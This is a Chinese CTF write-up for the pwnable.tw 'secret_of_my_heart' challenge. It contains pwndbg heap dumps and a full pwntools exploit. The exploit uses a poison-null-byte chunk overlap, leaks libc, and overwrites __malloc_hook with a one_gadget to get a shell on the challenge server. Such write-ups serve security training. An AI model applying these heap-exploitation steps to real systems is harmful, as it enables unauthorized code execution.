By

Contents
  1. 1. secret_of_my_heart
    1. 1.1. 分析
    2. 1.2. exp

secret_of_my_heart

分析

1
2
3
4
5
6
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
FORTIFY:  Enabled

libc为ubuntu16

  1. name处泄露堆地址—>libc地址
  2. 利用poison_null_byte构造重叠堆块
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
pwndbg> x/50gx 0x55772c5e7000
0x55772c5e7000:	0x0000000000000000	0x0000000000000031		# 0
0x55772c5e7010:	0x6262626262626262	0x6262626262626262
0x55772c5e7020:	0x6262626262626262	0x6262626262626262
0x55772c5e7030:	0x6262626262626262	0x0000000000020fd1		
0x55772c5e7040:	0x000055772c5e7110	0x00007fdaa1abeb78
0x55772c5e7050:	0x6363636363636363	0x6363636363636363
0x55772c5e7060:	0x6363636363636363	0x6363636363636363
0x55772c5e7070:	0x6363636363636363	0x6363636363636363
0x55772c5e7080:	0x6363636363636363	0x6363636363636363
0x55772c5e7090:	0x6363636363636363	0x6363636363636363
0x55772c5e70a0:	0x6363636363636363	0x6363636363636363
0x55772c5e70b0:	0x6363636363636363	0x6363636363636363
0x55772c5e70c0:	0x0000000000000090	0x0000000000000050		# 可被修改块 3
0x55772c5e70d0:	0x6363636363636363	0x6363636363636363
0x55772c5e70e0:	0x6363636363636363	0x6363636363636363
0x55772c5e70f0:	0x6363636363636363	0x6363636363636363
0x55772c5e7100:	0x6363636363636363	0x6363636363636363
0x55772c5e7110:	0x6161616161616100	0x0000000000000021
0x55772c5e7120:	0x00007fdaa1abeb78	0x00007fdaa1abeb78
0x55772c5e7130:	0x0000000000000020	0x0000000000000000
0x55772c5e7140:	0x0000000000000110	0x0000000000000110
0x55772c5e7150:	0x6161616161616161	0x6161616161616161
0x55772c5e7160:	0x6161616161616161	0x6161616161616161
0x55772c5e7170:	0x0000000000000000	0x0000000000000000
0x55772c5e7180:	0x0000000000000000	0x0000000000000000
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
pwndbg> x/50gx 0x55ff8cab6000
0x55ff8cab6000:	0x0000000000000000	0x0000000000000031
0x55ff8cab6010:	0x0000000000000000	0x0000000000000000
0x55ff8cab6020:	0x0000000000000000	0x0000000000000000
0x55ff8cab6030:	0x0068732f6e69622f	0x0000000000000091		# 再次申请0x80大小到这块,1
0x55ff8cab6040:	0x000055ff8cab0064	0x00007f220ed26b78
0x55ff8cab6050:	0x6363636363636363	0x6363636363636363
0x55ff8cab6060:	0x6363636363636363	0x6363636363636363
0x55ff8cab6070:	0x6363636363636363	0x6363636363636363
0x55ff8cab6080:	0x6363636363636363	0x6363636363636363
0x55ff8cab6090:	0x6363636363636363	0x6363636363636363
0x55ff8cab60a0:	0x6363636363636363	0x6363636363636363
0x55ff8cab60b0:	0x6363636363636363	0x6363636363636363
0x55ff8cab60c0:	0x0000000000000090	0x0000000000000111		# 2, 3
0x55ff8cab60d0:	0x6464646464646464	0x6464646464646464
0x55ff8cab60e0:	0x6464646464646464	0x6464646464646464
0x55ff8cab60f0:	0x6464646464646464	0x6464646464646464
0x55ff8cab6100:	0x6464646464646464	0x6464646464646464
0x55ff8cab6110:	0x6464646464646464	0x6464646464646464
0x55ff8cab6120:	0x6464646464646464	0x6464646464646464
0x55ff8cab6130:	0x6464646464646464	0x0000000000000070		# fake size
0x55ff8cab6140:	0x0000000000000100	0x0000000000000110
0x55ff8cab6150:	0x6161616161616161	0x6161616161616161
0x55ff8cab6160:	0x6161616161616161	0x6161616161616161
0x55ff8cab6170:	0x0000000000000000	0x0000000000000000
0x55ff8cab6180:	0x0000000000000000	0x0000000000000000

再free2,打印3就可以得到libc基址。

  1. __malloc_hooksystem,因为__free_hook周围没有符合条件的fake size,全是00,所以选择改__malloc_hook

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#!usr/bin/python
from pwn import *
context.log_level = 'debug'

binary = "./secret_of_my_heart"
ip = "chall.pwnable.tw"
port = 10302
elf = ELF(binary)

def add(size, sec):
	io.sendlineafter("Your choice :", str(1))
	io.sendlineafter(" : ", str(size))
	io.sendafter(" :", "k"*0x20)
	io.sendafter(" :", sec)

def show(idx):
	io.sendlineafter("Your choice :", str(2))
	io.sendlineafter("Index :", str(idx))
	
def delete(idx):
	io.sendlineafter("Your choice :", str(3))
	io.sendlineafter("Index :", str(idx))
	
def pwn(ip, port, debug):
	global io
	if debug == 1:
		io = process(binary)
		libc = elf.libc
		one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
		# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")	
	else:
		io = remote(ip, port)
		libc = ELF("libc_64.so.6")
		one = [0x45216, 0x4526a, 0xef6c4, 0xf0567]
	
	add(0x20, "a" * 0x20)		# 0
	show(0)
	io.recvuntil("k"*0x20)
	heap = u64(io.recv(6).ljust(8, '\x00')) - 0x10
	success("heap = "+hex(heap))
	add(0x100, "a" * 0xF0+p64(0x100))		# 1
	add(0x100, "a" * 0x20)		# 2
	delete(1)
	delete(0)
	payload = "/bin/sh\x00"
	payload = payload.rjust(0x28, "\x00")
	add(0x28, payload)		# 0
	# delete(2)
	add(0x80, "c" * 0x80)
	add(0x40, "c" * 0x40)		# ...
	
	delete(1)
	delete(2)
	
	add(0x80, "d")		# 1
	add(0x100, "d"*0x68 + p64(0x70))		# 2/3
	add(0x80, "d")		# 4
	
	delete(2)
	show(3)
	io.recvuntil("Secret : ")
	libc_base = u64(io.recv(6).ljust(8, '\x00'))-88-0x10-libc.symbols['__malloc_hook']# -0x3C4B78
	success("libc_base = "+hex(libc_base))
	
	malloc_addr = libc_base + libc.sym['__malloc_hook']
	sys_addr = libc_base + libc.sym['system']
	binsh_addr = libc_base + libc.search("/bin/sh\x00").next()
	one = libc_base + one[2]
	success("malloc_addr = "+hex(malloc_addr))
	success("sys_addr = "+hex(sys_addr))
	success("binsh_addr = "+hex(binsh_addr))
	
	delete(1)
	add(0x100, "e"*0x80+p64(0)+p64(0x71))
	
	delete(3)
	delete(1)
	
	add(0x100, "f"*0x80+p64(0)+p64(0x71)+p64(malloc_addr-0x23))
	add(0x60, "f")
	# add(0x60, "\x00"*0x13+p64(sys_addr))
	add(0x60, "\x00"*0x13+p64(one))
	'''
	io.sendlineafter("Your choice :", str(1))
	io.sendlineafter(" : ", str(0x30))
	io.sendafter(" :", "k"*0x20)
	'''
	delete(3)
	io.interactive()

if __name__ == '__main__':
	pwn(ip, port, 0)


'''
unk_202018 + 48LL * i             :         secret_size
unk_202018 + 48LL * i + 8         :         name
unk_202018 + 48LL * i + 0x28      :         secret_addr

'''